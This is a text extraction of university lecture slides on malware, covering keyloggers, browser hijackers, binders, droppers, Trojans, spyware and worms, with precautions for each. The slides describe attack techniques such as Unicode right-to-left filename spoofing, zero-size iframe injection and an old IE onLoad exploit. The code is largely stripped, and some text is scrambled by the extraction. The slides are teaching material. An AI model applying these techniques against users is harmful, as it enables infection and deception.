Transcript Malware
The Attack and Defense of Computers
Dr.
許 富 皓
1
Malware
2
Malicious Software (Malware):
Security tools and toolkits Back doors (trap doors) Logic bombs Viruses Worms Binders Droppers Trojan Horses Browser Hijacker Spyware Rootkit URL Injection …
3
Security Tools and toolkits
Automatically scan for computer security weaknesses.
Can be used by both
security professionals attackers
.
and e.g.
Nessus
,
COPS
,
ISS
,
Tiger
, … and so on.
Unwittingly release reports to the public There are also programs and tool sets whose only function is to attack computers.
Script kids P.S. These tools may damage the systems that install them or may contain booby-trap that will compromise the systems that install them.
4
Logic Bombs
A
logic bomb
is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files, should he ever leave the company (and the salary database). Usually written by inner programmers.
5
Logic Bombs and Viruses and Worms
Software that is inherently malicious, such as
viruses
and
worms
, often contain logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. Many viruses attack their host systems on specific dates, such as
Friday the 13th
or
April Fool's Day
.
Trojans
that activate on certain dates are often called "
time bombs
".
6
Key Logger
A
program
or
hardware device
that captures every key depression on the computer. Also known as "Keystroke Cops," they are used to monitor a user's activities by recording every keystroke the user makes, including typos, backspacing, and retyping.
7
Security Concerns about Key Loggers
Keystroke logging can be achieved by both hardware and software means.
There is no easy way to prevent keylogging software being installed on your
PC
, as it is usually done by a method of stealth. If you are using a home
PC
, then it is likely to be free on any keystroke logging hardware (but remember there may be keystroke logging software).
8
Precautions against Key Loggers
Try and avoid typing private details on public
PC
s, Always try and avoid visiting sites on public
PC
s that require you to enter your login details, e.g. an online banking account.
9
Example
Ardamax Keylogger
[ 1 ]
10
URL
Injection
Change the
URL
submitted to a server belonging to some or all domains.
11
Browser Hijacker
12
Browser Hijacker
[ Rouse ]
A browser hijacker (sometimes called
hijackware
) is a type of malware program that alters your computer's browser settings so that you are redirected to Web sites that you had no intention of visiting.
13
Symptoms of Browser Hijackers (1)
[
Khanse
]
Home page is changed Default search engine is changed You can’t navigate to certain web pages like home pages of security software You get re-directed to pages you never intended to visit
14
Symptoms of Browser Hijackers (2)
You see ads or ads pop up on your screen. But these ads are not served by the website You see new toolbars added You see new Bookmarks or Favorites added.
Your web browser starts running sluggishly.
15
Infection of Browser Hijackers
[ Rouse ]
A browser hijacker may be installed as part of freeware installation.
A browser hijacker may also be installed without user permission, as the result of an infected e-mail, a file share, or a drive by download.
16
Redirection
[
PCSTATS
]
As well as making changes to your home page and other
IE
settings, a hijacker may also make entries to the
hosts
file on your system. This special file directly maps
DNS
addresses (web
URL
s) to
IP
addresses, so every time you typed certain
URL
s you might be redirected to the
IP
address of a sponsored search or porn site instead.
17
Absolute File Name of file
hosts
C:\WINDOWS\SYSTEM32\drivers\etc\hosts 18
Self-Protection Mechanisms of Browser Hijackers
[
PCSTATS
]
These programs often use a combination of hidden files and registry settings to reinstall themselves after removal, so deleting them or changing your
IE
settings back may well not work.
19
Add-on
20
Add-on
[ stackoverflow ]
Add-on: essentially anything that can be installed into the browser. This includes for example extensions themes plug-ins dictionaries language packs search engines.
21
Terminologies
[ alex301 ]
plug-in = 指那些需編譯成執行檔,用以提 供瀏覽器額外功能的東西 。 extension = 使用瀏覽器支援的程式語法, 用來改變瀏覽器功能與操作的東西 。 theme = 使用瀏覽器支援的程式語法,用來 改變瀏覽器外觀介面的東西 。 addon = plugin +extension + theme = 總稱 所有瀏覽器本體之外,用來改變瀏覽器的 東西。
22
Browser Plug-in
[ mozillazine ]
Plug-ins add new functionality to an application, such as viewing special graphical formats or playing multimedia content in a web browser. Plug-ins also differ from extensions, which modify or add to existing functionality.
23
Browser Plug-in
[ wikipedia ]
Plug-ins add specific abilities into browsers using application programming interfaces (
API
s) allowing third parties to create plug-ins that interact with the browser. The original
API
was
NPAPI
, but subsequently Google introduced the
PPAPI
interface in Chrome.
24
General Plug-in Framework
[ wikipedia ]
25
General Plug-in Mechanism
[ wikipedia ]
A host application provides services which the plug-in can use, including a way for plug-ins to register themselves with the host application and a protocol for the exchange of data with plug-ins.
26
Uses of Browser Plug-ins
Common uses of plug-ins on the web include displaying video in the browser, games, and music playback. Widely used plug-ins include Java, Flash, Quicktime, and Adobe Reader.
27
Browser Plug-in Form
A plug-in in the context of Mozilla-based applications is a binary component that, when registered with a browser, can display content that the browser itself cannot display natively.
28
Extension
[ wikipedia 1] [ wikipedia 2]
Extensions can be used to modify the behavior of existing features to an application or add entirely new features.
Therefore, after integration, extensions can be seen as part of the browser itself, tailored from a set of optional modules.
29
Extension technologies (1)
[ wikipedia ]
CSS (Cascading Style Sheets) DOM (Document Object Model) – Used to change XUL in real-time or to edit HTML that is currently loaded JavaScript – The primary language of Mozilla browsers XPCOM (Cross-Platform Component Object Model)
30
Extension technologies (2)
[ wikipedia ]
XPConnect XPI (Cross-Platform Installer) XUL ( XML User Interface Language) – Used to define the UI (User Interface) and interaction with user.
Mozilla Jetpack – a development kit aiming to lower the learning curve and development time for making add-ons
31
IE
Extension
[ ivy ]
Internet Explorer->Tools->Manage Addons 32
Mozilla Firefox
[ ivy ]
Mozilla Firefox->Tools->Add-ons->Extensions 33
Google Chrome
[ ivy ]
Google Chrome->Wrench Icon->Tools->Extensions 34
Browser Toolbar
[ wikipedia ]
A
browser toolbar
is a toolbar that resides within a browser's window. All major web browsers provide support to browser toolbar development as a way to extend the browser's
GUI
and functionality. Browser toolbars are considered to be a particular kind of
browser extensions
that present a toolbar.
35
Binder [ CA ]
36
Definition of Binder
A tool that combines two or more files into a single file, usually for the purpose of hiding one of them. A binder compiles the list of files that you select into one host file, which you can rename. A
host file
is a simple custom compiled program that will decompress and launch the
embedded programs
. When you start the host, the
embedded files
automatically decompressed and launched. in it are
37
Example
When a piece of malware is bound with
Notepad
, for instance, the result will appear to be
Notepad
, and appear to run like
Notepad
, but the piece of malware will also be run.
38
Program
YAB : Yet Another Binder User Guide
39
Embedded Files
The files embedded in a host file is not always a binary file. It can be a file of any type.
Even an embedded file is a binary file, it may be a normal program.
40
Dropper [ Wikipedia ]
41
Definition of a Dropper
A
dropper
is a program (malware component) that has been designed to "install" some sort of malware (virus, backdoor, etc) to a target system. Single stage: the malware code can be contained within the dropper in such a way as to avoid detection by virus scanners Two stages: the dropper may download the malware to the target machine once activated
42
Types of Droppers
Depending on how a dropper is executed, there are two major types of droppers: those that do not require user interaction perform through the exploitation of a system by some vulnerability those that require user interaction by convincing the user that it is some legitimate or benign program.
43
Trojan Horse [ Wikipedia ]
44
Trojan Horse
In the context of computer software, a
Trojan horse
is a malicious program that is disguised as or embedded within legitimate software .
Trojans use false and fake names to trick users into executing them. These strategies are often collectively termed
social engineering
. A Trojan is designed to operate with functions unknown to the victim.
The useful, or seemingly useful, functions serve as camouflage for these undesired functions.
45
Properties of Trojan Horses
Trojan horse programs
cannot
operate autonomously, in contrast to some other types of malware, like worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims if Trojans replicate and even distribute themselves, each new victim must run the program/Trojan. Due to the above reasons Trojan horses’ virulence depends on successful implementation of social engineering concepts but doesn’t depend on the flaws in a computer system's security design or configuration.
46
Categories of Trojan Horses
There are two common types of Trojan horses: a useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs computer clock setting software peer to peer file sharing utilities. a standalone program that masquerades as something else, like a game or image file (e.g.
firework.jpg.exe
in
Windows
.
47
Malware Parasitizes inside Trojan Horses
In practice, Trojan Horses in the wild often contain:
spying
functions (such as a
packet sniffer
)
backdoor
functions that allow a computer, unbeknownst to the owner, to be remotely controlled from the network, creating a
zombie computer
. The
Sony/BMG rootkit Trojan
, distributed on millions of music
CD
s through 2005, did both of these things.
Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.
48
Example of a Simple Trojan Horse
A simple example of a Trojan horse would be a program named
waterfalls.jpg.exe
claiming to be a free waterfall picture which, when run, instead begins erasing all the files on the computer.
49
E-Mail Trojan Horses
On the
Microsoft Windows
platform, an attacker might attach a an email message which entices the recipient into opening the file. Trojan horse with an innocent-looking filename to The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as
.exe
,
.com
,
.scr
,
.bat
, or
.pif
. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse has an extension that might be "masked" by giving it a name such as
Readme.txt.exe
.
With file extensions hidden, the user would only see
Readme.txt
and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.
50
Unicode 控制字元 202E 副檔名欺騙 [ 劉昱賢 ][ 1 ] 該手法係利用作業系統解讀檔案名稱時,若遇到Unicode控制字元,會改變檔 案名稱的顯示方式進行攻擊。attacker可以在檔案名稱中,插入特定的 Unicode控制字元,導致作業系統在顯示該檔案名稱時,誤導使用者。 大師兄 [202E]gpj.exe
real filename 其中括號內為
Unicode
控制字元
202E
, 該控制碼為不可視字元,可控制後續 字元由右至左顯示
(Right To Left Override
) 。 當作業系統解譯與顯示檔案名稱時,會將其顯示為 : 大師兄 exe.jpg
displayed filename
51
Unicode 控制字元 202E 副檔名欺騙 [ 劉昱賢 ]
52
Commonly Used Methods of Infection
E-mails.
Downloaded Files.
53
Emails and Trojan Horses
The majority of Trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a Trojan or virus.
54
Downloaded Files
The infected program doesn't have to arrive via email, though; it can be sent to you in an
Instant Message
downloaded from a Web site or by
FTP
delivered on a
CD
or floppy disk
55
Precautions against Trojan Horses (1)
Trojan Horses are commonly spread through an e-mail, much like other types of common viruses. The best ways to protect yourself and your company from Trojan Horses are as follows: If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail user you should confirm the source. P.S.: Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.
56
Precautions against Trojan Horses (2)
When setting up your you have the settings so that attachments do not open automatically.
e-mail client
make sure that Some e-mail clients come ready with an
anti-virus program
that scans any attachments before they are opened. If your client does not come with this it would be best to purchase one or download one for free.
Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an
auto-update option
included in your anti virus program you should turn it on, that way if you forget to update your software you can still be protected from threats
57
Precautions against Trojan Horses (3)
Avoid using peer-2-peer or
Kazaa
,
Limewire
,
P2P
sharing networks like
Ares
, or
Gnutella
because 1) 2) those programs are generally unprotected from Trojan Horses Trojan Horses are especially easy to spread through these programs Some of these programs do offer some virus protection but often they are not strong enough.
58
Precautions against Trojan Horses (4)
NEVER
download blindly from people or sites which you aren’t 100% sure about.
However, legal web sites may be comprised by attackers who may modify web pages to contain scripts to download malware. Even if the file comes form a friend, you still must be sure what the file is before opening it.
Ask your friend whether she/he sent the files to you.
Beware of hidden file extensions (Under Windows
susie.jpg.exe
is only shown as
susie.jpg
) Never user features in your programs that automatically get or preview files (
outlook
, preview mode ).
Never blindly type commands that others tell you to type, or go to the web site mentioned by strangers.
59
Well-known Trojan Horses
Back Orifice Back Orifice 2000 Beast Trojan NetBus SubSeven Downloader-EV Pest Trap flooder Tagasaurus Vundo trojan Gromozon Trojan 60
List of Trojan Horses
http://en.wikipedia.org/wiki/List_of_trojan_horses
61
網頁掛馬 [ 趨勢科技 ]
62
Definition
[ 趨勢科技 ] [ fanli7 ] 「網頁掛馬」又稱為網頁隱藏式惡意連結。 攻擊者會先針對某個漏洞 (通常是 Windows 或 IE 的漏洞) 設計出一個特殊 的網頁 (也就是木馬網頁),當被攻擊的一 般使用者瀏覽這個網頁,就會利用該漏洞無 聲無息的趁機將惡意程式下載到被攻擊的電 腦中然後運行。
63
Websites
You can be infected by visiting a rogue website.
Internet Explorer
is most often targeted by makers of Trojans and other pests. Some of the
IE
bugs improperly handle data (such as
HTML
or
images
) by executing it as a legitimate program. Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.
64
Features vs. Risks
The more "features" a web browser has, the higher your risk of having security holes that can be exploited by a Trojan horse.
for example
ActiveX
objects, some older versions of
Flash
Java 65
Example 1:
Microsoft IE window()
Arbitrary Code Execution Vulnerability
[ Secunia ]
The vulnerability is caused due to certain objects not being initialized correctly when the
window()
function is used in conjunction with the
event. This can be exploited to execute arbitrary code on a vulnerable browser via some specially crafted JavaScript code called directly when a site has been loaded.
Example:
Successful exploitation requires that the user is e.g. tricked into visiting a malicious website.
PROOF OF CONCEPT
66
Explanation [ Computer Terrorism ]
67
[ HTML Code Tutorial ]
The browser triggers
onLoad
when the document is finished loading. The contents of
onLoad JavaScript
is one or more commands.
So, for example, the following
tag tells the browser to bring up an alert box once the page is completely loaded:
68
MS IE
- Crash on JavaScript
window()
- calling (1)
There is a bug in
Microsoft Internet Explorer
, which causes a crash in it. The bug occurs, because
Microsoft Internet Explorer
can't handle a call to a
JavaScript-function
with the name of the "
window
"-object.
An
object
used in
Javascript
.
69
MS IE
- Crash on JavaScript
window()
- calling (2)
[ symantic ]
Internet Explorer fails to properly initialize the JavaScript `
Window()
' function. When the '
onLoad
' handler is set to call the improperly initialized `
Window()
' function, the Web browser attempts to call the address 0x006F005B , which is derived from the Unicode representation of '
OBJECT
'.
CALL DWORD [ECX+8]
1.
Crash, if pointing to non-code. 2.
Execution, if pointing to code.
It is shown that JavaScript prompt boxes can be used by attackers to fill the memory region at 0x00600000 with attacker-supplied data, allowing executable machine code to be placed into the required address space.
70
Dangerous Web Site
The web site pointed by the following
URL
is one containing the trap described in the previous slides.
HTTP MSIE
JavaScript OnLoad Rte CodeExec
[ symantic ]
http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
71
Microsoft Outlook
If you use
Microsoft Outlook
, you're vulnerable to many of the same problems that
Internet Explorer
has, even if you don't use
IE
directly. The same vulnerabilities exist since
Outlook
allows email to contain
HTML
and images and actually uses much of the same code to process these as
Internet Explorer
.
72
Example 2: Trojan Horse Exploits Image Flaw
[Declan McCullagh et al.]
EasyNews
, a provider of Usenet newsgroups, said it has identified two
JPEG
images that take advantage of a previously identified flaw ( a heap-based buffer overflow
[ Michael Cobb ]
way
Microsoft
) in the software handles graphics files.
Windows users could have their computers infected merely by opening one of those Trojan horse images .
Attackers tried to use these
JPEG
s to download Trojan (horse programs) to vulnerable computers.
73
Example 3: Comprise a Web Server and Add Hidden Download Instructions in Web Pages ( 網站掛馬 ) Create frame with size 0.
74
網站掛馬語法
[ OpenBlue ]
75
通常被利用 [ 弱點 ] [ SQL Injection ] 等 手法掛馬後,會在該網頁的[ 第一行或最 後一行中 ]出現[ 相關被掛馬語法 ] .
76
框架
(iframe)
掛馬 以下是部份語法 :
木馬網址
width=0 height=0> 77
JScript
文件掛馬 首先將以下語法存檔為 xxx.js
document.write("");
然後將此文件的 URL 利用各種方式上傳到 目標處 。 For example, JScript 掛馬的語法為:
> 78
Precautions against
掛馬 Operating systems offer
patches
to protect their users from certain threats and viruses, including Trojan Horses.
Software developers like
Microsoft
“close the hole” that the Trojan horse or other virus would use to get through to your system.
offer patches that in a sense If you keep your system updated with these patches your computer is kept much safer.
79
Spyware [ Wikipedia ]
80
A Large Number of Toolbars , Some Added by Spyware, Overwhelm an
IE
Session
81
Some Statistics about Spyware
[ A. Moshchuk et al. ][ Webroot ]
2005 A scan (2005) performed by
AOL
/
NCSA
of 329 customers’ computers found that 80% were infected with spyware programs.
Each infected computer contained an average of 93 spyware components.
2006: Despite the publicity about the dangers of spyware, infection rates are on the rise.
Webroot
spyware scan data shows that 89 percent of consumer PCs are infected with spyware.
U.S. home computer users are infected with an average of 30 pieces of spyware on their PCs.
82
Definition of Spyware
Spyware
is computer software that is installed surreptitiously on a personal computer to monitor intercept or take partial control over the user's interaction with the computer, without the user's informed consent.
83
Activities of Spyware
Spyware programs can secretly monitor the user's behavior and then send this information to a hacker over the Internet collect various types of personal information interfere with user control of the computer in other ways, such as installing additional software redirecting Web browser activity diverting advertising revenue to a third party.
84
Spyware Funcions
[ A. Moshchuk et al. ]
85
Types of Information Collected by Spyware
Spyware can collect many different types of information about a user. More benign programs can attempt to track what types of websites a user visits and send this information to an advertisement agency.
More malicious versions can try to record what a user types to try to intercept passwords or credit card numbers.
86
OSes
vs.
Spyware
As of 2006, spyware has become one of the preeminent security threats to computer-systems running
Microsoft Windows OSes
. Some malware on the
X Linux
and
Mac OS
platforms has behavior similar to Windows spyware, but to date has not become anywhere near as widespread.
87
Spyware Certification
The Spyware-Free Certification program evaluates software to ensure that the program does not install or execute any forms of malicious code.
88
Typical Tactics Adopted by Spyware
Delivery of unsolicited pop-up advertisements.
Monitoring of Web-browsing activity for marketing purposes.
Theft of personal information
89
Adware (1)
[ wikipedia ]
Adware
, or computer.
advertising-supported software
displays, or downloads advertisements to a , is any software package which automatically plays, These advertisements can be in the form of a pop-up.
They may also be in the user interface of the software or on a screen presented to the user during the installation process.
90
Adware (2)
[ wikipedia ]
The object of the Adware is to generate revenue for its author. Adware, by itself, is harmless; however, some adware may come with integrated spyware such as keyloggers and other privacy-invasive software.
91
Spyware and Pop-up Ads
Spyware
displays advertisements related to what it finds from spying on you, not the ones posted by advertisers.
Claria
Corporation's
Gator
Software and
Advertising
's
BargainBuddy
Exact
provide examples of this sort of program. Visited Web sites frequently install
Gator
on client machines in a surreptitious manner, and it directs revenue to the installing site and to
Claria
by displaying advertisements to the user.
The user experiences a large number of
pop-up advertisements
.
92
Pop-up Ads
Pop-up ads
or
popups
are a form of online advertising on the World Wide Web. It works when certain web pages open a new web browser window to display advertisements.
93
Creation of Pop-up Window
The pop-up window containing an advertisement is usually generated by
JavaScript
, but can be generated by other means as well.
94
Pop-under Ads
A variation on the pop-up window is the
pop-under advertisement
. This opens a new browser window, behind the
active window
.
Pop-unders interrupt the user less, but are not seen until the desired windows are closed, making it more difficult for the user to determine which Web page opened them.
95
Dozens of Pop-up Ads Cover a Desktop.
96
Web Activity Monitor
Spyware behavior, such as reporting on websites the user visits, frequently accompany the displaying of advertisements. Monitoring web activity aims at building up a marketing profile on users in order to sell "targeted" advertisement impressions.
97
Other Victims of Spyware
The prevalence of spyware has cast suspicion upon other programs that track Web browsing, even for statistical or research purposes. Some observers describe the
Alexa Toolbar
, an Internet Explorer plug-in published by
Amazon.com
, as spyware (and some anti-spyware programs report it as such) although many users choose to install it.
98
Identity Theft and Fraud
Some spyware is closely associated with identity theft. Spyware may transmit the following information to attackers: chat sessions, user names, passwords, bank information, etc. Spyware has principally become associated with identity theft in that
keyloggers
are routinely packaged with spyware. John Bambenek, who researches information security, estimates that identity thieves have stolen over $24 billion
US
dollars of account information in the United States alone
99
Routes of Infection
100
Routes of Infection
Spyware does not directly spread in the manner of a computer virus or worm: generally, an infected system does not attempt to transmit the infection to other computers. Instead, spyware gets on a system through deception of the user or through exploitation of software vulnerabilities.
101
Masquerade
One way of distributing spyware involves tricking users by manipulating security features designed to prevent unwanted installations.
102
Masquerade - Example
The
Internet Explorer Web browser
, by design, prevents websites from initiating an unwanted download. Instead, a user action (such as clicking on a link) must normally trigger a download. However, links can prove deceptive: For instance, 1.
2.
3.
A pop-up ad may appear like a standard Windows dialog box.
The box contains a message such as "Would you like to optimize your Internet access?" with links which look like buttons reading
Yes
and
No
. No matter which "button" the user presses, a download starts, placing the spyware on the user's system.
103
A Masquerade Example
Malicious websites may attempt to install spyware on readers' computers. In this screenshot a
website
has triggered a pop-up that offers spyware in the guise of a security upgrade.
104
Bundled with Shareware
Spyware can also come bundled with
shareware
other downloadable software music
CD
s. The user downloads a program (for instance, a music program or a file-trading utility) and installs it, and the installer additionally installs the spyware. Although the desirable software itself may do no harm, the bundled spyware does. In some cases, spyware authors have paid shareware authors to bundle spyware with their software. In other cases, spyware authors have repackaged desirable free software with installers that add spyware.
105
Bundled Shareware Example
The
BearShare
file-trading program, "supported" by
WhenU
spyware. In order to install
BearShare
, users must agree to install "
the SAVE!
bundle" from
WhenU
. The installer provides only a tiny window in which to read the lengthy license agreement. Although the installer claims otherwise, the software transmits users' browsing activity to
WhenU
servers.
106
Through Trojan Horse
Classically, a Trojan horse, by definition, smuggles in something dangerous in the guise of something desirable. Some spyware programs get spread in just this manner. The distributor of spyware presents the program as a useful utility — for instance as a
Web accelerator
or as a
helpful software agent
. Users download and install the software without immediately suspecting that it could cause harm.
107
Vulnerabilities in Web Browsers
Some spyware authors infect a system by attacking security holes in the
Web browser
or in other software. When the user navigates to a Web page controlled by the spyware author, the page contains code which attacks the browser and forces the download and install of spyware.
Common browser exploits target security vulnerabilities in
Internet Explorer
and in the
Microsoft Java
runtime.
108
Notable Programs Distributed with Spyware
Messenger Plus!
Bearshare Bonzi Buddy Morpheus RadLight WeatherBug EDonkey2000
(only if you agree to install their "sponsor" program)
DAEMON Tools
(only if you agree to install their "sponsor" program)
DivX
(except for the paid version, and the "standard" version without the encoder).
DivX
announced removal of
GAIN
software from version 5.2.
Dope Wars ErrorGuard FlashGet Grokster
(free version)
Kazaa 109
Worm
110
Worms
Worm spread themselves through proactively attacking programs with specific vulnerability.
Most frequently used attack approaches included buffer overflow attacks, format string attacks, integer overflow attacks, … and so on.
Morris Worm
,1988
Code Red
,
Slammer
.
111
Comparisons between Viruses, Trojan Horses, and Worms
The way they behave How are they triggered?
How do they spread?
Need host programs?
112